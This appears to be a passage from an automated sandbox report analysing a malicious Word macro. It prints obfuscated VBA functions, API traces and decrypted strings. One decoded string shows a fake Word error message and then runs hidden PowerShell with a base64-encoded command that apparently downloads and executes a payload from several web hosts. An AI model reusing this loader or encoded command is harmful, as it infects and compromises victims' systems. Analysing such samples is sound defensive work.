206	oOysMtDG.WriteLine "dWnMFoTBPDqeJK"	WriteLine WriteLine WriteLine WriteLine WriteLine
207	oOysMtDG.WriteLine "budRDJKVnJRU"	WriteLine WriteLine WriteLine WriteLine WriteLine
208	Set GNnZJzE = wUoJIFDD	wUoJIFDD wUoJIFDD wUoJIFDD wUoJIFDD wUoJIFDD
209	oOysMtDG.Close	Close Close Close Close Close
210	Set xCaTC = Nothing
211	Set bGnhXCA = XKPUEfhk	XKPUEfhk XKPUEfhk XKPUEfhk XKPUEfhk XKPUEfhk
212	Set oOysMtDG = Nothing
212	oOysMtDG:
214	T_dehutl_mggmhizd = Tx84obagfrrh42q
215	Goto hiZkEEF
216	Dim hSbDPCC as Object
217	Set EbuwEJS = xOnWA	xOnWA xOnWA xOnWA xOnWA xOnWA
218	Set hSbDPCC = CreateObject(Bp63ahh3hb4hyq("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))	CreateObject CreateObject CreateObject CreateObject CreateObject
219	Dim hiZkEEF as Object
220	Set hiZkEEF = hSbDPCC.CreateTextFile("pygNv:\znIpFIR\yniMs.nmiIGDEDA")	CreateTextFile CreateTextFile CreateTextFile CreateTextFile CreateTextFile
221	hiZkEEF.WriteLine "bVawaPADALVlWFFA"	WriteLine WriteLine WriteLine WriteLine WriteLine
222	hiZkEEF.WriteLine "lRcGHADAHrlHJJA"	WriteLine WriteLine WriteLine WriteLine WriteLine
223	hiZkEEF.WriteLine "utFMeJhUKJhJ"	WriteLine WriteLine WriteLine WriteLine WriteLine
224	Set zOQlGPVC = kboRA	kboRA kboRA kboRA kboRA kboRA
225	hiZkEEF.Close	Close Close Close Close Close
226	Set hSbDPCC = Nothing
227	Set pSFXACJ = wCjuwBBGN	wCjuwBBGN wCjuwBBGN wCjuwBBGN wCjuwBBGN wCjuwBBGN
228	Set hiZkEEF = Nothing
228	hiZkEEF:
230	U0booztsqdpx = Y4o_ocvl0jti6oho0r(T_dehutl_mggmhizd)
231	Goto UPhhYZEF
232	Dim lEOlGYxK as Object
233	Set nKtfECko = HOkLRDGd	HOkLRDGd HOkLRDGd HOkLRDGd HOkLRDGd HOkLRDGd
234	Set lEOlGYxK = CreateObject(Bp63ahh3hb4hyq("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))	CreateObject CreateObject CreateObject CreateObject CreateObject
235	Dim UPhhYZEF as Object
236	Set UPhhYZEF = lEOlGYxK.CreateTextFile("sojcFeJ:\zxDxYHq\rNbtS.PtHuEEP")	CreateTextFile CreateTextFile CreateTextFile CreateTextFile CreateTextFile
237	UPhhYZEF.WriteLine "ozrZBTZBTMMIBB"	WriteLine WriteLine WriteLine WriteLine WriteLine
238	UPhhYZEF.WriteLine "uJnfBHIPFKBxHBmEE"	WriteLine WriteLine WriteLine WriteLine WriteLine
239	UPhhYZEF.WriteLine "ZRotGHIxyrpSqvsXCC"	WriteLine WriteLine WriteLine WriteLine WriteLine
240	Set WxujBIAMz = eBddHTXP	eBddHTXP eBddHTXP eBddHTXP eBddHTXP eBddHTXP
241	UPhhYZEF.Close	Close Close Close Close Close
242	Set lEOlGYxK = Nothing
243	Set mmkTuwH = TFXNGIiH	TFXNGIiH TFXNGIiH TFXNGIiH TFXNGIiH TFXNGIiH
244	Set UPhhYZEF = Nothing
244	UPhhYZEF:
246	Bp63ahh3hb4hyq = U0booztsqdpx
247	Goto bPFNuJ
248	Dim VcIiQJFi as Object
249	Set yyoqEHETu = lgZgGO	lgZgGO lgZgGO lgZgGO lgZgGO lgZgGO
250	Set VcIiQJFi = CreateObject(Bp63ahh3hb4hyq("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))	CreateObject CreateObject CreateObject CreateObject CreateObject
251	Dim bPFNuJ as Object
252	Set bPFNuJ = VcIiQJFi.CreateTextFile("gNgYGZ:\CatdBMGGg\qGsdAdOQH.cJsxtdJE")	CreateTextFile CreateTextFile CreateTextFile CreateTextFile CreateTextFile
253	bPFNuJ.WriteLine "PFQdBLHsDnfTZv"	WriteLine WriteLine WriteLine WriteLine WriteLine
254	bPFNuJ.WriteLine "BWSOKPyHMnSQxi"	WriteLine WriteLine WriteLine WriteLine WriteLine
255	bPFNuJ.WriteLine "cnLcFxEphoEbAFA"	WriteLine WriteLine WriteLine WriteLine WriteLine
256	Set iytziJ = UMzHfyAfA	UMzHfyAfA UMzHfyAfA UMzHfyAfA UMzHfyAfA UMzHfyAfA
257	bPFNuJ.Close	Close Close Close Close Close
258	Set VcIiQJFi = Nothing
259	Set kskMAAHA = zgBjJOGEH	zgBjJOGEH zgBjJOGEH zgBjJOGEH zgBjJOGEH zgBjJOGEH
260	Set bPFNuJ = Nothing
260	bPFNuJ:
262	End Function

Function Y4o_ocvl0jti6oho0r, APIs: 93, Strings: 11, Number of lines: 34, Relevance: 216.034

APIs	Meta Information
Lz6ghzf8pxt17d
nIHrI
CreateObject
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: rtGyqOth
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateObject
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateTextFile
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: wUoJIFDD
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: Close
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: XKPUEfhk
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: xOnWA
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateObject
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateTextFile
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: kboRA
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: Close
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: wCjuwBBGN
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: HOkLRDGd
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateObject
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateTextFile
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: eBddHTXP
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: Close
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: TFXNGIiH
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: lgZgGO
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateObject
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateTextFile
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: UMzHfyAfA
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: Close
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: zgBjJOGEH
CreateTextFile
WriteLine
WriteLine
WriteLine
yJouG
Close
LVadAF
Replace	Replace("w]anw[3in]anw[3m]anw[3gm]anw[3t]anw[3]anw[3]anw[3]anw[3s]anw[3]anw[3]anw[3:w]anw[3]anw[3in]anw[33]anw[32]anw[3_]anw[3]anw[3p]anw[3]anw[3ro]anw[3]anw[3ce]anw[3s]anw[3s]anw[3]anw[3","]anw[3",) -> winmgmts:win32_process Replace("]anw[3]anw[3c]anw[3m]anw[3d]anw[3 ]anw[3c]anw[3m]anw[3d]anw[3 ]anw[3c]anw[3m]anw[3d]anw[3 ]anw[3c]anw[3m]anw[3d]anw[3 ]anw[3/]anw[3c]anw[3 ]anw[3m]anw[3s]anw[3g]anw[3 ]anw[3%]anw[3u]anw[3s]anw[3e]anw[3r]anw[3n]anw[3a]anw[3m]anw[3e]anw[3%]anw[3 ]anw[3/]anw[3v]anw[3 ]anw[3W]anw[3o]anw[3r]anw[3d]anw[3 ]anw[3e]anw[3x]anw[3p]anw[3e]anw[3r]anw[3i]anw[3e]anw[3n]anw[3c]anw[3e]anw[3d]anw[3 ]anw[3a]anw[3n]anw[3 ]anw[3e]anw[3r]anw[3r]anw[3o]anw[3r]anw[3 ]anw[3t]anw[3r]anw[3y]anw[3i]anw[3n]anw[3g]anw[3 ]anw[3t]anw[3o]anw[3 ]anw[3o]anw[3p]anw[3e]anw[3n]anw[3 ]anw[3t]anw[3h]anw[3e]anw[3 ]anw[3f]anw[3i]anw[3l]anw[3e]anw[3.]anw[3 ]anw[3&]anw[3 ]anw[3 ]anw[3P]anw[3^]anw[3O]anw[3w]anw[3^]anw[3e]anw[3r]anw[3^]anw[3s]anw[3h]anw[3e]anw[3^]anw[3L]anw[3^]anw[3L]anw[3 ]anw[3-]anw[3w]anw[3 ]anw[3h]anw[3i]anw[3d]anw[3d]anw[3e]anw[3n]anw[3 ]anw[3-]anw[3E]anw[3N]anw[3C]anw[3O]anw[3D]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 JA]anw[3A5]anw[3AD]anw[3UA]anw[3WA]anw[3BV]anw[3AG]anw[3MA]anw[3RA]anw[3Ag]anw[3AC]anw[3AA]anw[3PQ]anw[3Ag]anw[3AC]anw[3AA]anw[3Ww]anw[3BU]anw[3AF]anw[3kA]anw[3cA]anw[3BF]anw[3AF]anw[30A]anw[3KA]anw[3Ai]anw[3AH]anw[3sA]anw[3MA]anw[3B9]anw[3AH]anw[3sA]anw[3Mg]anw[3B9]anw[3AH]anw[3sA]anw[3NA]anw[3B9]anw[3AH]anw[3sA]anw[3Mw]anw[3B9]anw[3AH]anw[3sA]anw[3MQ]anw[3B9]anw[3AC]anw[3IA]anw[3IA]anw[3At]anw[3AG]anw[3YA]anw[3Jw]anw[3BT]anw[3AF]anw[3kA]anw[3Uw]anw[3BU]anw[3AG]anw[3UA]anw[3Jw]anw[3As]anw[3AC]anw[3cA]anw[3Qw]anw[3BU]anw[3AE]anw[38A]anw[3Ug]anw[3B5]anw[3AC]anw[3cA]anw[3LA]anw[3An]anw[3AE]anw[30A]anw[3Jw]anw[3As]anw[3AC]anw[3cA]anw[3Ug]anw[3BF]anw[3AC]anw[3cA]anw[3LA]anw[3An]anw[3AC]anw[34A]anw[3aQ]anw[3Bv]anw[3AC]anw[34A]anw[3ZA]anw[3BJ]anw[3AC]anw[3cA]anw[3KQ]anw[3Ag]anw[3AC]anw[3AA]anw[3Ow]anw[3Ag]anw[3AC]anw[3AA]anw[3cw]anw[3BF]anw[3AF]anw[3QA]anw[3LQ]anw[3BJ]anw[3AH]anw[3QA]anw[3RQ]anw[3Bt]anw[3AC]anw[3AA]anw[3IA]anw[3Ao]anw[3AC]anw[3cA]anw[3Vg]anw[3An]anw[3AC]anw[3sA]anw[3Jw]anw[3Bh]anw[3AH]anw[3IA]anw[3aQ]anw[3BB]anw[3AE]anw[3IA]anw[3TA]anw[3Bl]anw[3AC]anw[3cA]anw[3Kw]anw[3An]anw[3AD]anw[3oA]anw[3Rg]anw[3BJ]anw[3AF]anw[3UA]anw[3Jw]anw[3Ap]anw[3AC]anw[3AA]anw[3IA]anw[3Ao]anw[3AC]anw[3AA]anw[3IA]anw[3Bb]anw[3AH]anw[3QA]anw[3eQ]anw[3Bw]anw[3AE]anw[3UA]anw[3XQ]anw[3Ao]anw[3AC]anw[3IA]anw[3ew]anw[3Ax]anw[3AH]anw[30A]anw[3ew]anw[3A0]anw[3AH]anw[30A]anw[3ew]anw[3Aw]anw[3AH]anw[30A]anw[3ew]anw[3A2]anw[3AH]anw[30A]anw[3ew]anw[3A1]anw[3AH]anw[30A]anw[3ew]anw[3Az]anw[3AH]anw[30A]anw[3ew]anw[3Ay]anw[3AH]anw[30A]anw[3Ig]anw[3Ag]anw[3AC]anw[30A]anw[3Zg]anw[3An]anw[3AE]anw[30A]anw[3Lg]anw[3Bu]anw[3AE]anw[3UA]anw[3VA]anw[3Au]anw[3AF]anw[3MA]anw[3ZQ]anw[3BS]anw[3AC]anw[3cA]anw[3LA]anw[3An]anw[3AH]anw[3MA]anw[3WQ]anw[3Bz]anw[3AH]anw[3QA]anw[3Jw]anw[3As]anw[3AC]anw[3cA]anw[3VA]anw[3BN]anw[3AG]anw[3EA]anw[3Tg]anw[3BB]anw[3AE]anw[3cA]anw[3ZQ]anw[3By]anw[3AC]anw[3cA]anw[3LA]anw[3An]anw[3AE]anw[34A]anw[3Jw]anw[3As]anw[3AC]anw[3cA]anw[3RQ]anw[3An]anw[3AC]anw[3wA]anw[3Jw]anw[3BJ]anw[3AC]anw[3cA]anw[3LA]anw[3An]anw[3AH]anw[3YA]anw[3SQ]anw[3Bj]anw[3AE]anw[3UA]anw[3UA]anw[3Bv]anw[3AC]anw[3cA]anw[3KQ]anw[3Ap]anw[3AD]anw[3sA]anw[3JA]anw[3BF]anw[3AH]anw[3IA]anw[3cg]anw[3Bv]anw[3AH]anw[3IA]anw[3QQ]anw[3Bj]anw[3AH]anw[3QA]anw[3aQ]anw[3Bv]anw[3AG]anw[34A]anw[3UA]anw[3By]anw[3AG]anw[3UA]anw[3Zg]anw[3Bl]anw[3AH]anw[3IA]anw[3ZQ]anw[3Bu]anw[3AG]anw[3MA]anw[3ZQ]anw[3Ag]anw[3AD]anw[30A]anw[3IA]anw[3Ao]anw[3AC]anw[3cA]anw[3Uw]anw[3Bp]anw[3AC]anw[3cA]anw[3Kw]anw[3Ao]anw[3AC]anw[3cA]anw[3bA]anw[3Bl]anw[3AC]anw[3cA]anw[3Kw]anw[3An]anw[3AG]anw[34A]anw[3Jw]anw[3Ap]anw[3AC]anw[3sA]anw[3KA]anw[3An]anw[3AH]anw[3QA]anw[3Jw]anw[3Ar]anw[3AC]anw[3cA]anw[3bA]anw[3B5]anw[3AE]anw[3MA]anw[3Jw]anw[3Ap]anw[3AC]anw[3sA]anw[3KA]anw[3An]anw[3AG]anw[38A]anw[3Jw]anw[3Ar]anw[3AC]anw[3cA]anw[3bg]anw[3B0]anw[3AC]anw[3cA]anw[3KQ]anw[3Ar]anw[3AC]anw[3gA]anw[3Jw]anw[3Bp]anw[3AC]anw[3cA]anw[3Kw]anw[3An]anw[3AG]anw[34A]anw[3dQ]anw[3Bl]anw[3AC]anw[3cA]anw[3KQ]anw[3Ap]anw[3AD]anw[3sA]anw[3JA]anw[3BI]anw[3AG]anw[3MA]anw[3Ng]anw[3Bj]anw[3AD]anw[3YA]anw[3dQ]anw[3B5]anw[3AD]anw[30A]anw[3JA]anw[3BJ]anw[3AD]anw[3cA]anw[3Ng]an,"]anw[3",) -> cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD JAA5ADUAWABVAGMARAAgACAAPQAgACAAWwBUAFkAcABFAF0AKAAiAHsAMAB9AHsAMgB9AHsANAB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBTAFkAUwBUAGUAJwAsACcAQwBUAE8AUgB5ACcALAAnAE0AJwAsACcAUgBFACcALAAnAC4AaQBvAC4AZABJACcAKQAgACAAOwAgACAAcwBFAFQALQBJAHQARQBtACAAIAAoACcAVgAnACsAJwBhAHIAaQBBAEIATABlACcAKwAnADoARgBJAFUAJwApACAAIAAoACAAIABbAHQAeQBwAEUAXQAoACIAewAxAH0AewA0AH0AewAwAH0AewA2AH0AewA1AH0AewAzAH0AewAyAH0AIgAgAC0AZgAnAE0ALgBuAEUAVAAuAFMAZQBSACcALAAnAHMAWQBzAHQAJwAsACcAVABNAGEATgBBAEcAZQByACcALAAnAE4AJwAsACcARQAnACwAJwBJACcALAAnAHYASQBjAEUAUABvACcAKQApADsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwBpACcAKwAoACcAbABlACcAKwAnAG4AJwApACsAKAAnAHQAJwArACcAbAB5AEMAJwApACsAKAAnAG8AJwArACcAbgB0ACcAKQArACgAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABIAGMANgBjADYAdQB5AD0AJABJADcANgBDACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABUADMANgBTADsAJABWADAANgBCAD0AKAAnAEkAMwAnACsAJwA5AEgAJwApADsAIAAgACgAZwBjAEkAIAAoACIAVgBBACIAKwAiAHIAaQBBAEIAIgArACIAbAAiACsAIgBFADoAOQA1ACIAKwAiAFgAdQBDAGQAIgApACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAUgBlAGEAVABgAEUAZABgAEkAUgBgAEUAYABDAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBDADMAcgBlACcAKwAnADUAYwAzAHsAMAB9ACcAKwAnAEQAaQAnACsAJwBfAHAAJwArACcAMwAnACsAJwBjADkAJwArACcAewAwAH0AJwApAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAEQAMQA1AEIAPQAoACgAJwBHADIAJwArACcAOAAnACkAKwAnAE8AJwApADsAIAAkAGYAaQB1ADoAOgAiAHMAZQBgAGMAYABVAHIASQBUAFkAcABSAG8AVABPAGAAYwBPAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAnACkAKwAnADEAMgAnACkAOwAkAFIAMwAyAEYAPQAoACcARwAnACsAKAAnADEANgAnACsAJwBaACcAKQApADsAJABDADcAegBpADkAdQB1ACAAPQAgACgAJwBPACcAKwAoACcAXwAnACsAJwA1AFoAJwApACkAOwAkAFcAXwAxAEQAPQAoACcARQAnACsAKAAnADEAOQAnACsAJwBUACcAKQApADsAJABXADcAaQBvADAAdwBnAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AJwArACgAJwBDACcAKwAnADMAcgBlADUAJwApACsAJwBjADMAJwArACcAewAnACsAJwAwAH0ARABpAF8AcAAzAGMAJwArACcAOQB7ACcAKwAnADAAfQAnACkALQBGAFsAQwBoAGEAcgBdADkAMgApACsAJABDADcAegBpADkAdQB1ACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABIADMANgBBAD0AKAAnAFIAJwArACgAJwA2AF8AJwArACcATwAnACkAKQA7ACQARwByADYAeABfAGgAXwA9ACgAKAAnAF0AYQAnACsAJwBuAHcAWwAzACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwBwACcAKwAnAGUAdABhAGYAJwApACsAKAAnAGkAbABtACcAKwAnAC4AYwBvACcAKQArACcAbQAnACsAKAAnAC8AdwAnACsAJwBwACcAKQArACgAJwAtAGEAJwArACcAZABtACcAKwAnAGkAbgAnACsAJwAvADQAbQAvAEAAXQAnACkAKwAnAGEAJwArACgAJwBuACcAKwAnAHcAWwAzACcAKwAnADoALwAvAGcAaQAnACsAJwB2AGkAJwApACsAKAAnAG4AZwAnACsAJwB0AGgAYQAnACsAJwBuAGsAcwBkACcAKQArACcAYQBpACcAKwAnAGwAJwArACgAJwB5AC4AYwAnACsAJwBvAG0ALwBxAGwARQAvAFYAZQBGAC8AJwArACcAQABdAGEAJwArACcAbgAnACkAKwAoACcAdwAnACsAJwBbADMAOgAvAC8AdwAnACkAKwAoACcAYQBwACcAKwAnAC4AJwApACsAJwB6AGgAJwArACgAJwBvAG4AZwAnACsAJwBsACcAKQArACcAaQAnACsAKAAnAHMAYwAnACsAJwAuAGMAJwArACcAbwAnACsAJwBtAC8AdwBwAC0AaQBuAGMAJwApACsAKAAnAGwAdQAnACsAJwBkAGUAcwAnACsAJwAvAFEAcgAnACsAJwB5AEMAJwApACsAJwBCAC8AJwArACcAQAAnACsAKAAnAF0AJwArACcAYQBuAHcAJwApACsAKAAnAFsAMwAnACsAJwBzADoALwAnACsAJwAvAGYAJwArACcAbgAnACsAJwBqAGIAcQAuAGMAbwBtAC8AdwBwAC0AaQAnACkAKwAoACcAbgBjACcAKwAnAGwAdQBkAGUAJwArACcAcwAvACcAKQArACgAJwByACcAKwAnAGwAUgAvAEAAJwArACcAXQBhAG4AdwBbACcAKwAnADMAcwAnACsAJwA6AC8ALwBzAGEAawAnACkAKwAoACcAaAAnACsAJwBpAHMAdQBoACcAKwAnAGEAbgAnACkAKwAnAGkAJwArACgAJwBuACcAKwAnAGEAcgBpAGoAZQAnACkAKwAoACcAZQB2AGkAawAnACsAJwBhAC4AJwApACsAKAAnAGMAJwArACcAbwBtAC8AJwApACsAJwB3ACcAKwAoACcAcAAnACsAJwAtAGkAJwApACsAKAAnAG4AYwAnACsAJwBsAHUAZAAnACkAKwAoACcAZQBzACcAKwAnAC8AQwB2AEcAJwApACsAKAAnAFUAJwArACcAagB2AEUALwBAAF0AJwArACcAYQBuAHcAWwAzADoAJwArACcALwAnACkAKwAoACcALwAnACsAJwB6ACcAKwAnAGkAZQBmAGwAaQB4ACcAKQArACgAJwAuACcAKwAnAHQAZQBsAGUAJwArACcAcwBrACcAKwAnAG8AJwArACcAcABzAHQAbwByAGUALgBjAG8AJwArACcAbQAnACkAKwAnAC8AYwAnACsAJwBnAGkAJwArACgAJwAtACcAKwAnAGIAaQBuACcAKQArACgAJwAvAEcAJwArACcAdAAzAFMALwBAACcAKQArACcAXQAnACsAJwBhAG4AJwArACgAJwB3AFsAJwArACcAMwAnACkAKwAnAHMAOgAnACsAKAAnAC8ALwBzAG8AbQBhAG4AYQBwAC4AYwBvACcAKwAnAG0ALwB3AHAAJwArACcALQBhAGQAJwArACcAbQAnACkAKwAoACcAaQBuACcAKwAnAC8AJwApACsAJwBQAC8AJwApAC4AIgByAGUAUABMAGAAQQBjAEUAIgAoACgAKAAnAF0AYQAnACsAJwBuAHcAJwApACsAJwBbACcAKwAnADMAJwApACwAKABbAGEAcgByAGEAeQBd
W06apxljciw_nbacx
fUDmDCt
CreateObject
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: rtGyqOth
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateObject
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateTextFile
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: wUoJIFDD
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: Close
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: XKPUEfhk
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: xOnWA
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateObject
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateTextFile
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: kboRA
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: Close
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: wCjuwBBGN
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: HOkLRDGd
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateObject
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateTextFile
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: eBddHTXP
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: Close
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: TFXNGIiH
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: lgZgGO
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateObject
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateTextFile
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: UMzHfyAfA
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: Close
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: zgBjJOGEH
CreateTextFile
WriteLine
WriteLine
WriteLine
ItSfCDCB
Close
ilONFzHG

Strings	Decrypted Strings
"]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
"EEGvGuF:\XrXnHGDDB\noadJZ.yGcKj"
"dxIGdcCHBKYgde"
"ALpzEMcwuWl"
"GhifcDKlpA"
"]a""nw[3"
"]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
"XFtOCOULb:\dMKcFHF\GAGPCEp.ZPnnAM"
"TOSxJaIzCudpDlB"
"qMnfwCwbPJC"
"MvkIFCHFTnRqD"

Line	Instruction	Meta Information
263	Function Y4o_ocvl0jti6oho0r(Ra1p5i7j_mc3)
264	Vpeqsux9lcw7ketv_ = Lz6ghzf8pxt17d	Lz6ghzf8pxt17d executed
265	Goto OBwIBy
266	Dim QZjuH as Object
267	Set SFmrEDJ = nIHrI	nIHrI
268	Set QZjuH = CreateObject(Bp63ahh3hb4hyq("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))	CreateObject
269	Dim OBwIBy as Object
270	Set OBwIBy = QZjuH.CreateTextFile("EEGvGuF:\XrXnHGDDB\noadJZ.yGcKj")	CreateTextFile
271	OBwIBy.WriteLine "dxIGdcCHBKYgde"	WriteLine
272	OBwIBy.WriteLine "ALpzEMcwuWl"	WriteLine
273	OBwIBy.WriteLine "GhifcDKlpA"	WriteLine
274	Set WSARpB = yJouG	yJouG
275	OBwIBy.Close	Close
276	Set QZjuH = Nothing
277	Set FTalMbF = LVadAF	LVadAF
278	Set OBwIBy = Nothing
278	OBwIBy:
280	Y4o_ocvl0jti6oho0r = Replace(Ra1p5i7j_mc3, "]a" + "nw[3", W06apxljciw_nbacx)	Replace("w]anw[3in]anw[3m]anw[3gm]anw[3t]anw[3]anw[3]anw[3]anw[3s]anw[3]anw[3]anw[3:w]anw[3]anw[3in]anw[33]anw[32]anw[3_]anw[3]anw[3p]anw[3]anw[3ro]anw[3]anw[3ce]anw[3s]anw[3s]anw[3]anw[3","]anw[3",) -> winmgmts:win32_process W06apxljciw_nbacx executed
281	Goto EUMDPGt
282	Dim UUoAB as Object
283	Set zLkRiC = fUDmDCt	fUDmDCt
284	Set UUoAB = CreateObject(Bp63ahh3hb4hyq("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))	CreateObject
285	Dim EUMDPGt as Object
286	Set EUMDPGt = UUoAB.CreateTextFile("XFtOCOULb:\dMKcFHF\GAGPCEp.ZPnnAM")	CreateTextFile
287	EUMDPGt.WriteLine "TOSxJaIzCudpDlB"	WriteLine
288	EUMDPGt.WriteLine "qMnfwCwbPJC"	WriteLine
289	EUMDPGt.WriteLine "MvkIFCHFTnRqD"	WriteLine
290	Set EVOuqJnGD = ItSfCDCB	ItSfCDCB
291	EUMDPGt.Close	Close
292	Set UUoAB = Nothing
293	Set vutdEkdRL = ilONFzHG	ilONFzHG
294	Set EUMDPGt = Nothing
294	EUMDPGt:
296	End Function

Module: Qafkrimwsho

Declaration

Line	Content
1	Attribute VB_Name = "Qafkrimwsho"

Module: Wm_t404p8v_

Declaration

Line	Content
1	Attribute VB_Name = "Wm_t404p8v_"
2	Attribute VB_Base = "1Normal.ThisDocument"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = True
8	Attribute VB_Customizable = True

Executed Functions

Subroutine Document_open, APIs: 120, Strings: 0, Number of lines: 3, Relevance: 181.503

APIs	Meta Information
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: P1x1ag4qbt2iq
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: Item
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: Swvko0y1qshqgm_
